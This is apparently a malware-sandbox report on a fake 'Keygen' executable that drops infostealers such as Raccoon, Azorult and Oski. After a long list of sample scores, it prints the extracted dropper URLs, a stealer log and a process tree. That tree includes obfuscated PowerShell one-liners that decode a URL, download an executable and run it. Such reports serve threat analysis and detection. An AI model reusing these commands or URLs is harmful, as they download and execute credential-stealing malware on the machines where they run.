Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    80s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (91) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:52:19 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (538 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:52:23 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (467 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============ Installed Apps:

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 3 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (91) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (91) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (91) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1680
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:952
          • C:\Users\Public\osc.exe
            "C:\Users\Public\osc.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2456
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2576
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2900
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2900 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\611890809949213\\* & exit
                  8⤵
                    PID:2980
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2900
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2880
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2664
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2852
              • C:\Users\Public\osc.exe
                "C:\Users\Public\osc.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2720
                • C:\Users\Admin\AppData\Local\Temp\z0jZnQkUH8.exe
                  "C:\Users\Admin\AppData\Local\Temp\z0jZnQkUH8.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2328
                • C:\Users\Admin\AppData\Local\Temp\a24UxWgEHb.exe
                  "C:\Users\Admin\AppData\Local\Temp\a24UxWgEHb.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2404
                • C:\Users\Admin\AppData\Local\Temp\olftVgy8uV.exe
                  "C:\Users\Admin\AppData\Local\Temp\olftVgy8uV.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2084
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kd5rosri.inf
                    8⤵
                      PID:2592
                  • C:\Users\Admin\AppData\Local\Temp\TvtYFjt95n.exe
                    "C:\Users\Admin\AppData\Local\Temp\TvtYFjt95n.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2264
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 704
                      8⤵
                      • Loads dropped DLL
                      • Program crash
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1492
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\osc.exe"
                    7⤵
                      PID:2020
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:1872
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\m1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1728
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1308
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:1844
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\b.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1868
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
